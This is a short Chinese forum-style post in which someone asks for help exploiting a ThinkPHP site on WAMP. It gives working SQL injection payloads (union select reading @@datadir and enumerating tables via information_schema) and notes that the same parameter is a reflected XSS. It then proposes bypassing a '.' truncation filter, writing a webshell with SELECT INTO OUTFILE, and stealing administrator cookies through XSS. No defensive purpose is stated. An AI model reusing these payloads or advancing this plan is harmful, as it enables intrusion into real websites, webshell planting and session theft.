Wamp环境,用thinkphp框架制作,手工检测发现一个注入点。/content/117 xand 1=2 union select @@datadir,2,3,4,5,6x
这个注入点同时还是一个反射型xss,id值被写入到了内联js里。
接着提交
and 1=2 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=(hex值)
返回空白,查看源代码发现”.”之后的语句被截断了。
现在有几个思路,求指点
1.构造特殊语句,使语句中不出现”.”。
2.通过Select into outfile导出webshell。但由于框架问题”/”和”\”都被认为是目录。
3.构造xss获取管理员cookies。eg:/content/117;alert(document.cookie)
